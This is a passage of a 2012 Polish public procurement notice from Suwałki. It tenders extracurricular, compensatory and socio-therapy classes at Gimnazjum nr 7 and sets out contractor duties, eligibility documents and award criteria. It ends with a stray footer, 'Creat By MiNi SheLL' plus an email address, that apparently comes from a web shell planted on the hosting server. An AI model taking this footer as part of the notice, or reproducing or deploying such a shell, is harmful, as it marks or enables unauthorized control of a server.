Termin realizacji: II-VI 2012 r. (32 godzin), IX-XII 2012 r. (13 godzin), I-VI 2013 r. 
(15 godzin)
Ilość osób w grupie: maks. 12

Część 76
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 7-Geografia i Biologia 
Liczba godzin: 80
Termin realizacji: II-VI 2012 r. (40 godzin), IX-XII 2012 r. (20 godzin), I-VI 2013 r. 
(20 godzin)
Ilość osób w grupie: maks. 8

Część 77
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 7-Geografia i Biologia 
Liczba godzin: 80
Termin realizacji: II-VI 2012 r. (40 godzin), IX-XII 2012 r. (20 godzin), I-VI 2013 r. 
(20 godzin)
Ilość osób w grupie: maks. 8

Część 78
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 7w Suwałkach - Język angielski 
Liczba godzin: 60
Termin realizacji: II-VI 2012 r. (30 godzin), IX-XII 2012 r. (15 godzin), I-VI 2013 r. 
(15 godzin)
Ilość osób w grupie: maks. 8

Część 79
Zajęcia dodatkowe wpływające na rozwój kompetencji kluczowych wśród uczniów Gimnazjum nr 7 w Suwałkach - Język angielski 
Liczba godzin: 81		
Termin realizacji: II-VI 2012 r. (30 godzin), IX-XII 2012 r. (15 godzin), I-VI 2013 r. 
(15 godzin)
Ilość osób w grupie: maks. 9

Część 80
Zajęcia kompensacyjno-wyrównawcze w Gimnazjum nr 7 w Suwałkach
Liczba godzin: 60
Termin realizacji: II-VI 2012 r. (30 godzin), IX-XII 2012 r. (15 godzin), I-VI 2013 r. 
(15 godzin)
Ilość osób w grupie: maks. 5

Część 81
Zajęcia kompensacyjno-wyrównawcze w Gimnazjum nr 7 w Suwałkach
Liczba godzin: 60
Termin realizacji: II-VI 2012 r. (30 godzin), IX-XII 2012 r. (15 godzin), I-VI 2013 r. 
(15 godzin)
Ilość osób w grupie: maks. 5

Część 82
Zajęcia dodatkowe, rozwijające zainteresowania artystyczne (plastyczne i rozwoju twórczości) uczniów w Gimnazjum nr 7 w Suwałkach - Zajęcia plastyczne
Liczba godzin: 60
Termin realizacji: II-VI 2012 r. (30 godzin), IX-XII 2012 r. (15 godzin), I-VI 2013 r. 
(15 godzin)
Ilość osób w grupie: maks. 9

Część 83
Zajęcia dodatkowe, rozwijające zainteresowania artystyczne (plastyczne i rozwoju twórczości) uczniów w Gimnazjum nr 7 w Suwałkach - zajęcia rozwoju twórczość
Liczba godzin: 60
Termin realizacji: II-VI 2012 r. (30 godzin), IX-XII 2012 r. (15 godzin), I-VI 2013 r. 
(15 godzin)
Ilość osób w grupie: maks. 10

Część 84
Zajęcia socjoterapeutyczne w Gimnazjum nr 7 w Suwałkach
Liczba godzin: 92
Termin realizacji: II-VI 2012 r. (38 godzin), IX-XII 2012 r. (26 godzin), I-VI 2013 r. 
(28 godzin)
Ilość osób w grupie: maks. 5

Część 85
Zajęcia socjoterapeutyczne w Gimnazjum nr 7 w Suwałkach
Liczba godzin: 92
Termin realizacji: II-VI 2012 r. (38 godzin), IX-XII 2012 r. (26 godzin), I-VI 2013 r. 
(28 godzin)
Ilość osób w grupie: maks. 5


W ramach ww. części zamówienia, wykonawca będzie zobowiązany do:
- opracowanie programu nauczania i szczegółowego planu zajęć pozalekcyjnych, zgodnego z ofertą oraz przedstawienie do akceptacji dyrektorowi Gimnazjum nr 
w Suwałkach, zwanej dalej szkołą, w oparciu o udostępnione programy zajęć;
- przeprowadzenie rekrutacji dzieci do niniejszego projektu;
- zebranie od rodziców-opiekunów prawnych deklaracji uczestnictwa ich dzieci 
w projekcie;
- prowadzenie zajęć pozalekcyjnych zgodnie z harmonogramem
- dokumentowanie zajęć pozalekcyjnych w dzienniku zajęć, kartach czasu pracy, listach, obecności, sprawozdaniach, zgodnie z zaleceniami Zamawiającego;
- mierzenie rezultatów na początku i na końcu trwania zajęć za pomocą wywiadów, ankiet, testów kompetencyjnych;
- przygotowanie i przeprowadzenie (wśród uczniów) wywiadów, ankiet, testów kompetencyjnych oraz ankiet wśród rodziców-opiekunów prawnych;
- sporządzenie oceny opisowej każdego ucznia uczestniczącego w projekcie na podstawie m.in. wywiadów, ankiet, testów kompetencyjnych, kart pracy dziecka oraz postępu dokonanego przez ucznia w trakcie realizacji projektu;
- informowanie wychowawcy, dyrektora, rodziców-opiekunów prawnych o wynikach i o osiągnięciach uczniów;
- prawidłowe i systematyczne prowadzenie dokumentacji projektu oraz przekazywanie raz na kwartał (z wyłączeniem wakacji, ferii zimowych, przerw świątecznych), w formie elektronicznej i papierowej, informacji dyrektorowi szkoły, w której realizowany jest projekt oraz Zamawiającemu o stanie realizacji planu zajęć, w tym ilości zrealizowanych godzin;
- wspomaganie promocji i ewaluacji projektu - informowanie o współfinansowaniu projektu ze środków Europejskiego Funduszu Społecznego oraz współpraca 
z Zamawiającym w mierzeniu postępów uczniów w zakresie rezultatów projektu;
- ponoszenie odpowiedzialności materialnej za mienie będące własnością szkoły oraz Beneficjenta projektu - udostępnione osobie realizującej zajęcia;
- przestrzeganie regulaminu pracowni w szkole, w której prowadzone są zajęcia;
- podejmowanie decyzji, w uzgodnieniu z dyrektorem szkoły, w sprawie doboru metod i środków dydaktycznych właściwych dla prowadzonych zajęć, ze szczególnym stosowaniem aktywizujących metod nauczania, z naciskiem na umiejętność wykorzystania wiedzy w praktyce;
- sporządzenie sprawozdania rocznego z diagnozy problemów i analizy rezultatów założonych i osiągniętych przez uczniów - uczestniczących w realizacji przedmiotu umowy na zajęciach oraz przeprowadzanie diagnozy uczestników we wstępnym i końcowym etapie projektu.

Przez określenie 1 godzina zajęć, w niniejszym postępowaniu należy rozumieć jednostkę o wartości 45 min..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 85.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje szczegółowego opisu ww. warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje szczegółowego opisu ww. warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje szczegółowego opisu ww. warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował osobą/osobami, która posiada uprawnienia określone 
w Rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009 roku 
w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli nie mających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. Nr 50, poz. 400, z późn. zm.)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje szczegółowego opisu ww. warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca, w myśl art. 26 ust. 2 b ustawy, może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Stopień awansu zawodowego - 40</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmianyumowy są dopuszczalne za zgodą obu stron wyłącznie w niżej
wskazanym zakresie i przy spełnieniu poniższych warunków:
1) zmiana okresu wykonania czynności związanych z realizacją projektu,
2) zmniejszenie wartości zamówienia realizowanego przez Wykonawcę, jeżeli wystąpią okoliczności niezawinione przez wykonawcę, których strony nie mogły przewidzieć w dniu zawarcia niniejszej umowy,
3) w przypadku:
a) wystąpienia siły wyższej,
b) zmiany obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy,
c) zmian wniesionych do projektu przez uprawniony podmiot.
Zmiany umowy nie mogą powodować zwiększenia wartości całego zamówienia, a także wymagają formy pisemnej, pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.um.suwalki.pl/Przetargi_sekcja/zamo_publ_w_2012_lista.htm<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Suwałkach
ul. Mickiewicza 1,
16-400 Suwałki
pok. nr 137.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.02.2012 godzina 10:00, miejsce: Urząd Miejski w Suwałkach
ul. Mickiewicza 1,
16-400 Suwałki
pok. nr 4-5.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn. Otwarty umysł - drogą do sukcesu dofinansowany z Programu Operacyjnego Kapitał Ludzki, Priorytetu IX Rozwój wykształcenia i kompetencji w regionach, Działania 9.1 Wyrównanie szans edukacyjnych 
i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałania 9.1.2 Wyrównanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com